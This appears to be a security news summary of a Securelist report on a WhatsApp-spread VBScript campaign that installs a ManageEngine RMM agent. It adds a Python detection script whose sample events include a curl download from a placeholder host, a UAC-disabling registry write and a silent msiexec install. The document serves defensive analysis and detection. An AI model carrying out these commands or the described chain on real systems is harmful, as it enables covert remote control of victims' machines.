80% of the victims are in Malaysia, and the attackers are using nothing more exotic than VBScript files sent through WhatsApp Desktop and Web. Kaspersky's Securelist team published a detailed breakdown of a campaign active since June 2026 that compromises WhatsApp accounts and sends financial-themed .vbs attachments to the victim's contact list. WhatsApp Desktop is the preferred delivery path. Clicking the attachment in the chat spawns WScript.exe directly from WhatsApp.Root.exe, with the script sitting in the app's attachment storage directory. On WhatsApp Web, the user has to open the downloaded file from the Downloads folder, making Desktop the easier infection vector. No accompanying text in the messages - just the file. The attacker likely gained access to multiple WhatsApp accounts; the exact compromise method remains unknown.
The Three-Stage Infection Chain

Stage 1 is a VBScript masquerading as a business document - "Debt Statement.vbs", "Billing Statement (2).vbs", even localized versions in Portuguese, Malay, and German. The script creates a working directory under C:\Users\Public\Documents\ with random names like Temp_ or MSUpdate_, sets hidden and system attributes, and downloads two secondary VBS payloads. Obfuscation is heavy: string concatenation, encoded code, randomized variable names, and junk content. Some variants copy curl.exe and bitsadmin.exe into the working directory, renaming them to DLL-like names before using them to fetch the next stage.

Stage 2 consists of two scripts. The first repeatedly tries to set HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin to 0 - disabling UAC prompts - using ShellExecute with the runas verb in a loop. The second downloads a ZIP archive from attacker-controlled infrastructure, extracts it via Shell.Application COM, strips the Zone.Identifier ADS to avoid security warnings, and launches the embedded setup1.vbs.

Stage 3 unpacks a preconfigured ManageEngine Endpoint Central agent package: the MSI installer, server configuration (DCAgentServerInfo.json), certificates, and an installation script. The setup1.vbs silently runs msiexec.exe with the supplied config, installing the RMM agent without any visible UI. One variant even placed a fake "Income Tax Return Form.vbs" alongside the installer files to trick the user into running it.
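The delivery path and the three stages above each leave a distinct host-telemetry footprint: a script host spawned by the WhatsApp process with a .vbs argument, execution out of a Temp_/MSUpdate_ directory under Public\Documents, a renamed curl/bitsadmin binary, a write of 0 to ConsentPromptBehaviorAdmin, and a silent msiexec install from that same directory. The following Python is an added example, not code from Kaspersky or the Securelist write-up, showing how a defender might express those indicators as rules and correlate them. The event records are constructed, Sysmon-like dictionaries (field names such as parent_image and original_file_name are assumptions for this example), and the directory names, URL and MSI file name are placeholders.

```python
"""Detection rules for the WhatsApp .vbs -> RMM chain (added example, constructed data)."""
import ntpath
import re

# Constructed sample telemetry: simplified, Sysmon-like records. Field names are
# assumptions for this example; paths, random suffixes, URL and MSI name are placeholders.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process",
     "parent_image": r"C:\Program Files\WhatsApp\WhatsApp.Root.exe",
     "image": r"C:\Windows\System32\WScript.exe",
     "original_file_name": "wscript.exe",
     "command_line": r'"C:\Windows\System32\WScript.exe" "C:\Users\alice\AppData\Local\WhatsApp\Attachments\Debt Statement.vbs"'},
    {"id": 2, "type": "process",  # curl.exe copied and renamed to a DLL-like name
     "parent_image": r"C:\Windows\System32\WScript.exe",
     "image": r"C:\Users\Public\Documents\MSUpdate_7f3a\msvcrt2.dll",
     "original_file_name": "curl.exe",
     "command_line": r"msvcrt2.dll -s -o stage2.vbs http://placeholder.invalid/s2"},
    {"id": 3, "type": "registry",  # UAC consent prompt for admins disabled
     "image": r"C:\Windows\System32\WScript.exe",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin",
     "value": "0"},
    {"id": 4, "type": "process",  # silent MSI install of the agent from the hidden working directory
     "parent_image": r"C:\Windows\System32\WScript.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "original_file_name": "msiexec.exe",
     "command_line": r'msiexec.exe /i "C:\Users\Public\Documents\Temp_91bc\installer.msi" /qn'},
    {"id": 5, "type": "process",  # benign control: user opens a document normally
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "original_file_name": "winword.exe",
     "command_line": r'"WINWORD.EXE" C:\Users\alice\Documents\report.docx'},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
RENAMED_TOOLS = {"curl.exe", "bitsadmin.exe"}
UAC_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin"
# Stage-1 working directory: C:\Users\Public\Documents\Temp_* or MSUpdate_*
WORKDIR_RE = re.compile(r"c:\\users\\public\\documents\\(temp|msupdate)_", re.IGNORECASE)


def base(path):
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()


def rule_whatsapp_spawns_script_host(ev):
    """Delivery: the WhatsApp process launches wscript/cscript on a .vbs file."""
    return (ev["type"] == "process"
            and base(ev["parent_image"]).startswith("whatsapp")
            and base(ev["image"]) in SCRIPT_HOSTS
            and ".vbs" in ev["command_line"].lower())


def rule_hidden_workdir(ev):
    """Stage 1: anything executing from or referencing the Temp_/MSUpdate_ directory."""
    return (ev["type"] == "process"
            and bool(WORKDIR_RE.search(ev.get("image", "") + " " + ev.get("command_line", ""))))


def rule_renamed_tool(ev):
    """Stage 1: curl.exe/bitsadmin.exe running under a different file name (PE metadata mismatch)."""
    original = ev.get("original_file_name", "").lower()
    return (ev["type"] == "process"
            and original in RENAMED_TOOLS
            and base(ev["image"]) != original)


def rule_uac_prompt_disabled(ev):
    """Stage 2: ConsentPromptBehaviorAdmin set to 0."""
    return (ev["type"] == "registry"
            and ev["target"].lower() == UAC_KEY.lower()
            and ev["value"].strip() == "0")


def rule_silent_msi_from_public(ev):
    """Stage 3: msiexec run quietly against an MSI under Public\\Documents."""
    cl = ev.get("command_line", "").lower()
    return (ev["type"] == "process"
            and base(ev["image"]) == "msiexec.exe"
            and any(flag in cl for flag in ("/qn", "/quiet", "/q "))
            and "c:\\users\\public\\documents\\" in cl)


RULES = [rule_whatsapp_spawns_script_host, rule_hidden_workdir, rule_renamed_tool,
         rule_uac_prompt_disabled, rule_silent_msi_from_public]


def analyze(events):
    """Return (event id, rule name) pairs for every rule that fires."""
    hits = []
    for ev in events:
        for rule in RULES:
            if rule(ev):
                hits.append((ev["id"], rule.__name__[len("rule_"):]))
    return hits


def chain_detected(events, min_distinct_rules=3):
    """Correlate: a single hit may be noise, several distinct stages on one host is the chain."""
    distinct = {name for _, name in analyze(events)}
    return len(distinct) >= min_distinct_rules


if __name__ == "__main__":
    for event_id, name in analyze(SAMPLE_EVENTS):
        print(f"event {event_id}: {name}")
    print("chain detected:", chain_detected(SAMPLE_EVENTS))
```

The per-rule functions map onto Sysmon event types that most endpoint telemetry already provides (process creation with OriginalFileName, and registry value set); the correlation in chain_detected is what turns individually weak signals like "msiexec ran quietly" into a confident detection of this particular chain.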
Attribution Clues and Infrastructure Overlaps

Endpoint Central management servers were found at IPs like 202.61.160.201 - an address previously tied to ValleyRAT and Gh0st RAT command-and-control infrastructure. The VBScript samples contain simplified Chinese comments referencing Windows Update modules and certificate validation, suggesting a Chinese-speaking operator. But Kaspersky rates attribution as low confidence; the overlaps could be shared hosting or reused infrastructure. The campaign is broad and opportunistic, hitting Malaysia, Brazil, India, Mexico, Singapore, the UK, Spain, Taiwan, Australia, Russia, and Vietnam. No specific organization targeting - just consumers who receive an unexpected .vbs from a known contact and click it.

What this means: legitimate RMM tools are the new backdoor. ManageEngine Endpoint Central is enterprise software designed for remote administration, but once installed, the attacker has persistent, silent access. Expect more campaigns to abuse built-in Windows scripting hosts and messaging platforms to drop trusted admin tools - and watch for .vbs attachments even from contacts you trust.
Source: A VBScript campaign distributed through WhatsApp deploying RMM software
Domain: securelist.com